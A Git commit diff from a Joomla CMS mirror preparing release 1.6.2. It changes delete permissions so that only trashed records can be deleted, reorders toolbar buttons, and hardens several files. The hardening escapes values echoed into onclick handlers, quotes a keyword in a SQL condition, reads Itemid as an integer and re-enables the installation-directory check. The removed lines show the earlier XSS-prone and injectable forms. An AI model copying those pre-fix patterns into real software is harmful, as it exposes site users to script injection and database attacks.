mirror of
https://github.com/joomla/joomla-cms.git
synced 2024-06-29 16:43:42 +00:00
Preparing for 1.6.2
git-svn-id: http://joomlacode.org/svn/joomla/development/trunk@21148 6f6e1ebd-4c2b-0410-823f-f34bde69bce9
This commit is contained in:
parent
5ce00dde60
commit
c4c870b5cb
|
@ -34,18 +34,23 @@ class BannersModelBanner extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
if (!empty($record->catid)) {
|
if (!empty($record->catid)) {
|
||||||
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
return parent::canDelete($record);
|
return parent::canDelete($record);
|
||||||
}
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state changed.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
|
|
@ -28,13 +28,18 @@ class BannersModelClient extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
if (!empty($record->catid)) {
|
return ;
|
||||||
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
}
|
||||||
}
|
$user = JFactory::getUser();
|
||||||
else {
|
|
||||||
return $user->authorise('core.delete', 'com_banners');
|
if (!empty($record->catid)) {
|
||||||
|
return $user->authorise('core.delete', 'com_banners.category.'.(int) $record->catid);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return $user->authorise('core.delete', 'com_banners');
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -88,15 +88,14 @@ class BannersViewBanners extends JView
|
||||||
JToolBarHelper::custom('banners.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
JToolBarHelper::custom('banners.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
||||||
}
|
}
|
||||||
|
|
||||||
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
|
|
||||||
|
if ($canDo->get('core.edit.state')) {
|
||||||
|
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
|
||||||
|
}
|
||||||
|
if ( $canDo->get('core.delete')) {
|
||||||
JToolBarHelper::deleteList('', 'banners.delete','JTOOLBAR_EMPTY_TRASH');
|
JToolBarHelper::deleteList('', 'banners.delete','JTOOLBAR_EMPTY_TRASH');
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
}
|
}
|
||||||
else if ($canDo->get('core.edit.state')) {
|
|
||||||
JToolBarHelper::trash('banners.trash','JTOOLBAR_TRASH');
|
|
||||||
JToolBarHelper::divider();
|
|
||||||
}
|
|
||||||
|
|
||||||
if ($canDo->get('core.admin')) {
|
if ($canDo->get('core.admin')) {
|
||||||
JToolBarHelper::preferences('com_banners');
|
JToolBarHelper::preferences('com_banners');
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
|
|
|
@ -69,11 +69,11 @@ class BannersViewClients extends JView
|
||||||
JToolBarHelper::archiveList('clients.archive','JTOOLBAR_ARCHIVE');
|
JToolBarHelper::archiveList('clients.archive','JTOOLBAR_ARCHIVE');
|
||||||
JToolBarHelper::custom('clients.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
JToolBarHelper::custom('clients.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
||||||
}
|
}
|
||||||
if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) {
|
if ($canDo->get('core.edit.state')) {
|
||||||
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
|
|
||||||
JToolBarHelper::divider();
|
|
||||||
} else if ($canDo->get('core.edit.state')) {
|
|
||||||
JToolBarHelper::trash('clients.trash','JTOOLBAR_TRASH');
|
JToolBarHelper::trash('clients.trash','JTOOLBAR_TRASH');
|
||||||
|
}
|
||||||
|
if ( $canDo->get('core.delete')) {
|
||||||
|
JToolBarHelper::deleteList('', 'clients.delete','JTOOLBAR_EMPTY_TRASH');
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
@ -34,10 +34,16 @@ class CategoriesModelCategory extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
|
return $user->authorise('core.delete', $record->extension.'.category.'.(int) $record->id);
|
||||||
}
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can be deleted.
|
||||||
|
|
|
@ -30,19 +30,18 @@ class ContactModelContact extends JModelAdmin
|
||||||
* @since 1.6
|
* @since 1.6
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
if ($record->catid) {
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
return $user->authorise('core.delete', 'com_contact.category.'.(int) $record->catid);
|
return $user->authorise('core.delete', 'com_contact.category.'.(int) $record->catid);
|
||||||
}
|
}
|
||||||
else {
|
|
||||||
return parent::canDelete($record);
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state edited.
|
||||||
*
|
*
|
||||||
* @param object $record A record object.
|
* @param object $record A record object.
|
||||||
*
|
*
|
||||||
|
|
|
@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td align="center">
|
<td align="center">
|
||||||
|
|
|
@ -39,13 +39,17 @@ class ContentModelArticle extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
return $user->authorise('core.delete', 'com_content.article.'.(int) $record->id);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state edited.
|
||||||
*
|
*
|
||||||
* @param object $record A record object.
|
* @param object $record A record object.
|
||||||
*
|
*
|
||||||
|
|
|
@ -88,7 +88,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
||||||
<?php echo $this->escape($item->title); ?></a>
|
<?php echo $this->escape($item->title); ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -55,13 +55,18 @@ class MenusModelItem extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
return $user->authorise('core.delete', 'com_menus.item.'.(int) $record->id);
|
return $user->authorise('core.delete', 'com_menus.item.'.(int) $record->id);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state edited.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
*
|
*
|
||||||
|
|
|
@ -185,13 +185,13 @@ class MenusViewItems extends JView
|
||||||
JToolBarHelper::divider();
|
JToolBarHelper::divider();
|
||||||
JToolBarHelper::custom('items.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
JToolBarHelper::custom('items.checkin', 'checkin.png', 'checkin_f2.png', 'JTOOLBAR_CHECKIN', true);
|
||||||
}
|
}
|
||||||
|
if ($canDo->get('core.edit.state')) {
|
||||||
|
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
|
||||||
|
}
|
||||||
if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) {
|
if ($this->state->get('filter.published') == -2 && $canDo->get('core.delete')) {
|
||||||
JToolBarHelper::deleteList('', 'items.delete','JTOOLBAR_EMPTY_TRASH');
|
JToolBarHelper::deleteList('', 'items.delete','JTOOLBAR_EMPTY_TRASH');
|
||||||
}
|
}
|
||||||
else if ($canDo->get('core.edit.state')) {
|
|
||||||
JToolBarHelper::trash('items.trash','JTOOLBAR_TRASH');
|
|
||||||
}
|
|
||||||
|
|
||||||
if ($canDo->get('core.edit.state')) {
|
if ($canDo->get('core.edit.state')) {
|
||||||
JToolBarHelper::makeDefault('items.setDefault', 'COM_MENUS_TOOLBAR_SET_HOME');
|
JToolBarHelper::makeDefault('items.setDefault', 'COM_MENUS_TOOLBAR_SET_HOME');
|
||||||
|
|
|
@ -85,8 +85,11 @@ class ModulesModelModule extends JModelAdmin
|
||||||
if ($table->load($pk)) {
|
if ($table->load($pk)) {
|
||||||
|
|
||||||
// Access checks.
|
// Access checks.
|
||||||
if (!$user->authorise('core.delete', 'com_modules')) {
|
if (!$user->authorise('core.delete', 'com_modules') ||
|
||||||
throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
|
$table->published != -2) {
|
||||||
|
JError::raiseWarning(403, JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
|
||||||
|
// throw new Exception(JText::_('JERROR_CORE_DELETE_NOT_PERMITTED'));
|
||||||
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
if (!$table->delete($pk)) {
|
if (!$table->delete($pk)) {
|
||||||
|
|
|
@ -34,18 +34,23 @@ class NewsfeedsModelNewsfeed extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->published != -2) {
|
||||||
if (!empty($record->catid)) {
|
return ;
|
||||||
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
|
}
|
||||||
}
|
$user = JFactory::getUser();
|
||||||
else {
|
|
||||||
return parent::canDelete($record);
|
if (!empty($record->catid)) {
|
||||||
}
|
return $user->authorise('core.delete', 'com_newsfeed.category.'.(int) $record->catid);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return parent::canDelete($record);
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state changed.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
|
|
@ -85,7 +85,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -24,6 +24,45 @@ class RedirectModelLink extends JModelAdmin
|
||||||
* @since 1.6
|
* @since 1.6
|
||||||
*/
|
*/
|
||||||
protected $text_prefix = 'COM_REDIRECT';
|
protected $text_prefix = 'COM_REDIRECT';
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Method to test whether a record can be deleted.
|
||||||
|
*
|
||||||
|
* @param object $record A record object.
|
||||||
|
*
|
||||||
|
* @return boolean True if allowed to delete the record. Defaults to the permission set in the component.
|
||||||
|
* @since 1.6
|
||||||
|
*/
|
||||||
|
protected function canDelete($record)
|
||||||
|
{
|
||||||
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
|
return ;
|
||||||
|
}
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
return $user->authorise('core.delete', 'com_redirect');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Method to test whether a record can have its state edited.
|
||||||
|
*
|
||||||
|
* @param object $record A record object.
|
||||||
|
*
|
||||||
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
* @since 1.6
|
||||||
|
*/
|
||||||
|
protected function canEditState($record)
|
||||||
|
{
|
||||||
|
$user = JFactory::getUser();
|
||||||
|
|
||||||
|
// Check the component since there are no categories or other assets.
|
||||||
|
if (!empty($record->id)) {
|
||||||
|
return parent::canEditState($record);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Returns a reference to the a Table object, always creating it.
|
* Returns a reference to the a Table object, always creating it.
|
||||||
*
|
*
|
||||||
|
|
|
@ -23,7 +23,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" size="40" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" size="40" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
||||||
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
||||||
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
||||||
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
||||||
</div>
|
</div>
|
||||||
<div class="right">
|
<div class="right">
|
||||||
<ol>
|
<ol>
|
||||||
|
@ -64,7 +64,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
foreach ($this->items as $item) : ?>
|
foreach ($this->items as $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $item->name; ?></a>
|
<?php echo $item->name; ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td align="center">
|
<td align="center">
|
||||||
|
@ -79,7 +79,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
</table>
|
</table>
|
||||||
<div>
|
<div>
|
||||||
<input type="hidden" name="task" value="" />
|
<input type="hidden" name="task" value="" />
|
||||||
<input type="hidden" name="field" value="<?php echo $field; ?>" />
|
<input type="hidden" name="field" value="<?php echo $this->escape($field); ?>" />
|
||||||
<input type="hidden" name="boxchecked" value="0" />
|
<input type="hidden" name="boxchecked" value="0" />
|
||||||
<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
|
<input type="hidden" name="filter_order" value="<?php echo $listOrder; ?>" />
|
||||||
<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
|
<input type="hidden" name="filter_order_Dir" value="<?php echo $listDirn; ?>" />
|
||||||
|
|
|
@ -34,18 +34,23 @@ class WeblinksModelWeblink extends JModelAdmin
|
||||||
*/
|
*/
|
||||||
protected function canDelete($record)
|
protected function canDelete($record)
|
||||||
{
|
{
|
||||||
$user = JFactory::getUser();
|
if (!empty($record->id)) {
|
||||||
|
if ($record->state != -2) {
|
||||||
if ($record->catid) {
|
return ;
|
||||||
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
|
}
|
||||||
}
|
$user = JFactory::getUser();
|
||||||
else {
|
|
||||||
return parent::canDelete($record);
|
if ($record->catid) {
|
||||||
}
|
return $user->authorise('core.delete', 'com_weblinks.category.'.(int) $record->catid);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return parent::canDelete($record);
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Method to test whether a record can be deleted.
|
* Method to test whether a record can have its state changed.
|
||||||
*
|
*
|
||||||
* @param object A record object.
|
* @param object A record object.
|
||||||
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
* @return boolean True if allowed to change the state of the record. Defaults to the permission set in the component.
|
||||||
|
|
|
@ -20,7 +20,7 @@ defined('_JEXEC') or die;
|
||||||
/*
|
/*
|
||||||
* Installation check, and check on removal of the install directory.
|
* Installation check, and check on removal of the install directory.
|
||||||
*/
|
*/
|
||||||
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
|
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
|
||||||
header('Location: ../installation/index.php');
|
header('Location: ../installation/index.php');
|
||||||
exit();
|
exit();
|
||||||
}
|
}
|
||||||
|
|
|
@ -90,7 +90,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<th>
|
<th>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</th>
|
</th>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -86,7 +86,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<th>
|
<th>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->title)); ?>', '<?php echo $this->escape($item->catid); ?>');">
|
||||||
<?php echo $this->escape($item->title); ?></a>
|
<?php echo $this->escape($item->title); ?></a>
|
||||||
</th>
|
</th>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -87,7 +87,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<?php foreach ($this->items as $i => $item) : ?>
|
<?php foreach ($this->items as $i => $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<th>
|
<th>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $this->escape($item->name); ?></a>
|
<?php echo $this->escape($item->name); ?></a>
|
||||||
</th>
|
</th>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -25,7 +25,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
<input type="text" name="filter_search" id="filter_search" value="<?php echo $this->escape($this->state->get('filter.search')); ?>" title="<?php echo JText::_('COM_USERS_SEARCH_IN_NAME'); ?>" />
|
||||||
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
<button type="submit"><?php echo JText::_('JSEARCH_FILTER_SUBMIT'); ?></button>
|
||||||
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
<button type="button" onclick="document.id('filter_search').value='';this.form.submit();"><?php echo JText::_('JSEARCH_FILTER_CLEAR'); ?></button>
|
||||||
<button type="button" onclick="if (window.parent) window.parent.<?php echo $function;?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
<button type="button" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('', '<?php echo JText::_('JLIB_FORM_SELECT_USER') ?>');"><?php echo JText::_('JOPTION_NO_USER')?></button>
|
||||||
</div>
|
</div>
|
||||||
<div class="filter-select">
|
<div class="filter-select">
|
||||||
<label for="filter_group_id">
|
<label for="filter_group_id">
|
||||||
|
@ -60,7 +60,7 @@ $listDirn = $this->escape($this->state->get('list.direction'));
|
||||||
foreach ($this->items as $item) : ?>
|
foreach ($this->items as $item) : ?>
|
||||||
<tr class="row<?php echo $i % 2; ?>">
|
<tr class="row<?php echo $i % 2; ?>">
|
||||||
<td>
|
<td>
|
||||||
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $function;?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
<a class="pointer" onclick="if (window.parent) window.parent.<?php echo $this->escape($function);?>('<?php echo $item->id; ?>', '<?php echo $this->escape(addslashes($item->name)); ?>');">
|
||||||
<?php echo $item->name; ?></a>
|
<?php echo $item->name; ?></a>
|
||||||
</td>
|
</td>
|
||||||
<td class="center">
|
<td class="center">
|
||||||
|
|
|
@ -85,6 +85,7 @@ class BannersModelBanners extends JModelList
|
||||||
if ($cid) {
|
if ($cid) {
|
||||||
$query->where('a.cid = ' . (int) $cid);
|
$query->where('a.cid = ' . (int) $cid);
|
||||||
$query->join('LEFT', '#__banner_clients AS cl ON cl.id = a.cid');
|
$query->join('LEFT', '#__banner_clients AS cl ON cl.id = a.cid');
|
||||||
|
$query->join('LEFT', '#__categories as cat ON a.catid = cat.id');
|
||||||
$query->select('cl.track_impressions as client_track_impressions');
|
$query->select('cl.track_impressions as client_track_impressions');
|
||||||
$query->where('cl.state = 1');
|
$query->where('cl.state = 1');
|
||||||
}
|
}
|
||||||
|
@ -138,7 +139,7 @@ class BannersModelBanners extends JModelList
|
||||||
foreach ($keywords as $keyword)
|
foreach ($keywords as $keyword)
|
||||||
{
|
{
|
||||||
$keyword=trim($keyword);
|
$keyword=trim($keyword);
|
||||||
$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING('".$keyword."',1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
|
$condition1 = "a.own_prefix=1 AND a.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH( a.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=1 AND cl.metakey_prefix=SUBSTRING(".$db->quote($keyword).",1,LENGTH(cl.metakey_prefix)) OR a.own_prefix=0 AND cl.own_prefix=0 AND ".($prefix==substr($keyword,0,strlen($prefix))?'1':'0');
|
||||||
|
|
||||||
$condition2="a.metakey REGEXP '[[:<:]]".$db->getEscaped($keyword) . "[[:>:]]'";
|
$condition2="a.metakey REGEXP '[[:<:]]".$db->getEscaped($keyword) . "[[:>:]]'";
|
||||||
|
|
||||||
|
@ -270,4 +271,4 @@ class BannersModelBanners extends JModelList
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
@ -410,7 +410,7 @@ final class JSite extends JApplication
|
||||||
$menu = $this->getMenu();
|
$menu = $this->getMenu();
|
||||||
$item = $menu->getActive();
|
$item = $menu->getActive();
|
||||||
if (!$item) {
|
if (!$item) {
|
||||||
$item = $menu->getItem(JRequest::getVar('Itemid'));
|
$item = $menu->getItem(JRequest::getInt('Itemid'));
|
||||||
}
|
}
|
||||||
|
|
||||||
$id = 0;
|
$id = 0;
|
||||||
|
|
|
@ -21,7 +21,7 @@ defined('_JEXEC') or die;
|
||||||
// Installation check, and check on removal of the install directory.
|
// Installation check, and check on removal of the install directory.
|
||||||
//
|
//
|
||||||
|
|
||||||
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) /*|| file_exists(JPATH_INSTALLATION.'/index.php')*/) {
|
if (!file_exists(JPATH_CONFIGURATION.'/configuration.php') || (filesize(JPATH_CONFIGURATION.'/configuration.php') < 10) || file_exists(JPATH_INSTALLATION.'/index.php')) {
|
||||||
|
|
||||||
if (file_exists(JPATH_INSTALLATION.'/index.php')) {
|
if (file_exists(JPATH_INSTALLATION.'/index.php')) {
|
||||||
header('Location: '.substr($_SERVER['REQUEST_URI'],0,strpos($_SERVER['REQUEST_URI'],'index.php')).'installation/index.php');
|
header('Location: '.substr($_SERVER['REQUEST_URI'],0,strpos($_SERVER['REQUEST_URI'],'index.php')).'installation/index.php');
|
||||||
|
|
|
@ -27,6 +27,9 @@ $ -> Language fix or change
|
||||||
- -> Removed
|
- -> Removed
|
||||||
! -> Note
|
! -> Note
|
||||||
|
|
||||||
|
|
||||||
|
-------------------- 1.6.2 Stable Release [14-Apr-2011] ------------------
|
||||||
|
|
||||||
